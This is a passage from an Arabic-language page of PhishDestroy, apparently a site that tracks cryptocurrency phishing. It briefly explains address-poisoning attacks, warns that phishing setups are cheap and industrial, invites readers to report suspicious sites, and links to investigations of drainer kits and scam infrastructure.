إزالة الغبار + التسمم
المعاملات الصغيرة من عناوين مشابهة تلوث سجل المعاملات الخاص بك. يقوم الضحية بنسخ العنوان المزيف من سجل المعاملات لاستخدامه في التحويل التالي.
قريبًا

الحقيقة المزعجة

تكاليف إعداد عملية تصيد احتيالي باستخدام العملات المشفرة $0 ويستغرق أقل من 30 دقيقة. استضافة مجانية، وخدمات النماذج المجانية، وروبوتات المراسلة المجانية. وقد قام المهاجم المسؤول عن الموقع رقم 1 بالفعل بجمع بيانات اعتماد من 1,824+ ضحية. الموقع رقم 4 قيد التشغيل الإعلانات المدفوعة على نطاق واسع. هذه ليست مسألة هواة — إنها صناعة. والدفاع الوحيد هو الوعي.

ساعدونا في التصدي لذلك

يقوم موقع PhishDestroy بتتبع مواقع التصيد الاحتيالي المتعلقة بالعملات المشفرة والإبلاغ عنها في الوقت الفعلي. إذا صادفت موقعًا مريبًا، فأبلغنا عنه — وسنقوم بالتحقيق في الأمر والعمل على إزالته.

التحقيقات ذات الصلة

التحقيق
نهاية موقع xmrwallet.com: «NameSilo» كذبت لحماية سارق «M»
سرقة عملة «مونيرو» على مدى 10 سنوات. تدخلت 3 شركات تسجيل. ولفقت «NameSilo» 7 أكاذيب.
تعمق في الموضوع
شبكات «Crypto Drainer»: الكشف عن البنية التحتية
كيف تتشارك عمليات «توفير خدمات الصرف» في البنية التحتية والمشغلين.
لوحة مكشوفة
لوحة التصيد الاحتيالي في Trust Wallet: صلاحيات إدارية كاملة
تمكنا من الوصول إلى لوحة التحكم الخاصة بعملية تصيد احتيالي تستهدف محفظة «Trust Wallet».
البنية التحتية
الكشف عن البنية التحتية لعمليات الاحتيال: الأنظمة الخلفية المشتركة
كيف تتشارك عمليات الاحتيال الخوادم والقوالب وتدفقات الدفع.

شارك هذا التحقيق

X / Twitter Telegram Reddit لينكدإن

التحقيقات ذات الصلة

لوحة التصيد الاحتيالي الخاصة بـ «Trust Wallet»: سرقة 239 ألف دولار، و6 مشغلين
تحقيق معمق
لوحة التصيد الاحتيالي الخاصة بـ «Trust Wallet»: سرقة 239 ألف دولار، و6 مشغلين
مجموعة أدوات «Crypto Drainer»: الكشف عن موزعي «Angel Drainer»
تحقيق معمق
مجموعة أدوات «Crypto Drainer»: الكشف عن موزعي «Angel Drainer»
الكشف عن المحتالين: تحليل 4 أنظمة خلفية لعمليات الاحتيال
التحقيق
الكشف عن المحتالين: تحليل 4 أنظمة خلفية لعمليات الاحتيال